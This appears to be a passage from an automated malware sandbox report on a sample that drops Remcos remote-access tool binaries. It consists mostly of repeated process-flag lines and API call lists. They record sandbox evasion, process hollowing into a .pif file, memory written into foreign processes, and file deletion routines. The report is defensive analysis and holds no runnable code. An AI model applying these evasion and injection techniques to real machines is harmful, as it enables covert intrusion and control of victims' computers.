              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Delayed program exit found
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040F7A7 Sleep,ExitProcess,6_1_0040F7A7
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040F7A7 Sleep,ExitProcess,10_1_0040F7A7
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,6_1_0041A748
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_1_0041A748
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeDropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifEvaded block: after key decisiongraph_6-47456
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifEvaded block: after key decisiongraph_6-47481
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifEvaded block: after key decision
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifEvaded block: after key decision
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifEvaded block: after key decision
              Source: C:\ProgramData\Remcos\remcos.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_7-6685
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifAPI coverage: 6.4 %
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifAPI coverage: 6.3 %
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D658CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02D658CC
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_1_00409253
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,6_1_0041C291
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,6_1_0040C34D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_1_00409665
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0044E879 FindFirstFileExA,6_1_0044E879
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,6_1_0040880C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040783C FindFirstFileW,FindNextFileW,6_1_0040783C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,6_1_00419AF5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_1_0040BD37
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 7_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,7_2_0040128D
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 7_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,7_2_00401612
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_1_00409253
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_1_0041C291
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_1_0040C34D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_1_00409665
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0044E879 FindFirstFileExA,10_1_0044E879
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_1_0040880C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040783C FindFirstFileW,FindNextFileW,10_1_0040783C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,10_1_00419AF5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_1_0040BD37
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 12_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,12_2_0040128D
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 12_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,12_2_00401612
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_1_00407C97
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.00000000006E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.00000000006B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(0o%SystemRoot%\system32\mswsock.dll
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000902000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.00000000008D0000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.0000000000726000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.00000000006F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeAPI call chain: ExitProcess graph end nodegraph_0-38658
              Source: C:\ProgramData\Remcos\remcos.exeAPI call chain: ExitProcess graph end nodegraph_7-6683
              Source: C:\ProgramData\Remcos\remcos.exeAPI call chain: ExitProcess graph end nodegraph_7-6679
              Source: C:\ProgramData\Remcos\remcos.exeAPI call chain: ExitProcess graph end node
              Source: C:\ProgramData\Remcos\remcos.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFAPI call chain: ExitProcess graph end node
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_1_004349F9
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D77AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02D77AC0
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004432B5 mov eax, dword ptr fs:[00000030h]6_1_004432B5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004432B5 mov eax, dword ptr fs:[00000030h]10_1_004432B5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00412077 GetProcessHeap,HeapFree,6_1_00412077
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_1_004349F9
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00434B47 SetUnhandledExceptionFilter,6_1_00434B47
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_1_0043BB22
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_1_00434FDC
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_004349F9
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00434B47 SetUnhandledExceptionFilter,10_1_00434B47
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_0043BB22
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_00434FDC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeMemory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeMemory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 1E060000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFMemory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFMemory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 1E060000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFMemory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFMemory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 18100000 protect: page execute and read and writeJump to behavior
              Sample uses process hollowing technique
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection unmapped: C:\Users\Public\Libraries\nmfsxfjX.pif base address: 400000Jump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFSection unmapped: C:\Users\Public\Libraries\nmfsxfjX.pif base address: 400000Jump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFSection unmapped: C:\Users\Public\Libraries\nmfsxfjX.pif base address: 400000Jump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeMemory written: C:\Users\Public\Libraries\nmfsxfjX.pif base: 2CD008Jump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFMemory written: C:\Users\Public\Libraries\nmfsxfjX.pif base: 218008Jump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFMemory written: C:\Users\Public\Libraries\nmfsxfjX.pif base: 370008Jump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe6_1_004120F7
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe10_1_004120F7
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00419627 mouse_event,6_1_00419627
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pifJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pifJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" Jump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pifJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00434C52 cpuid 6_1_00434C52
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_02D7D5D0
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02D65A90
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: GetLocaleInfoA,0_2_02D6A7CC
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: GetLocaleInfoA,0_2_02D6A780
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02D65B9C
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_02D7D5D0
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_02D85FA0
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: EnumSystemLocalesW,6_1_00452036
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_1_004520C3
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoW,6_1_00452313
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: EnumSystemLocalesW,6_1_00448404
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_1_0045243C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoW,6_1_00452543
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_1_00452610
